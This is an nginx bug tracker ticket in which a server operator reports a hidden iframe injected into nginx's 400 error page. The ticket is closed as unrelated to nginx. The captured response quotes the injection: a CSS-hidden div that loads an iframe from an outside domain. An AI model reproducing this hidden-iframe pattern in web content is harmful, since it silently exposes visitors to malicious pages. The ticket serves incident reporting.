Opened 11 years ago

Closed 11 years ago

#244 closed defect (invalid)

Injection in HTTP special response

Reported by: www.google.com/accounts/o8/id?id=AItOawluN7sETdPjzS-XDW9NVBS_yKZdwZ4THvs Owned by: somebody
Priority: critical Milestone:
Component: private Version: 1.2.x
Keywords: Cc:
uname -a: Linux 2.6.32-5-amd64 #1 SMP Sun May 6 04:00:17 UTC 2012 x86_64 GNU/Linux
nginx -V: nginx version: nginx/1.2.3
built by gcc 4.4.5 (Debian 4.4.5-8)
TLS SNI support enabled
configure arguments: --with-http_realip_module --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --pid-path=/var/run/nginx.pid --http-log-path=/var/log/nginx/access.log --lock-path=/var/lock/nginx.lock --with-http_dav_module --http-client-body-temp-path=/proxy/var/body --http-proxy-temp-path=/proxy/var/proxy --http-fastcgi-temp-path=/proxy/var/fastcgi --with-http_ssl_module --with-http_stub_status_module --with-http_flv_module

Description

I have a server configured, among other things, to return a 400 code to all requests using an unrecognized server_name (or not Host header at all):

server {
    listen          80 default backlog=2048;
    listen          443 default backlog=2048 ssl;
    server_name     _;
    access_log      off;
    location / {
        return  400;
    }
}

So you would normally get this:

Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 400 Bad Request
Server: nginx/1.2.3
Date: Wed, 07 Nov 2012 09:18:03 GMT
Content-Type: text/html
Content-Length: 172
Connection: close

<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.2.3</center>
</body>
</html>
Connection closed by foreign host.

Yesterday I noticed that some hacker somehow managed to inject an iframe in it:

Escape character is '^]'.
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Server: nginx/1.2.3
Date: Wed, 07 Nov 2012 00:01:24 GMT
Content-Type: text/html
Content-Length: 353
Connection: close

<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white"><style>.kzur45{position:absolute;left:-5000px; top:-5000px}</style><div class="kzur45"><iframe src="http://sourcesclothes.net/links/categorys_news-links-pattern.php"></iframe></div>
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.2.3</center>
</boHTTP/1.1 400 BConnection closed by foreign host.

Nginx files were not modified (compared md5s to the originals), and restarting it restored things back to normal.

I unfortunately don't have more information - I went through logs of the previous days and was unable to find anything suspicious.

It looks like something either messed with the predefined responses in ngx_http_special_response.c, or somewhere down the chain. If the former, a safety net may be to make those strings or structures (e.g. ngx_http_error_400_page) 'static const' so that they would normally end up in .rodata memory?

Change History (2)

comment:1 by Sergey Budnevitch, 11 years ago

Component: nginx-coreprivate

comment:2 by maxim, 11 years ago

Resolution: invalid
sensitive: 0
Status: newclosed

The sumbitter reported privately that the problem didn't relate to nginx.

Note: See TracTickets for help on using tickets.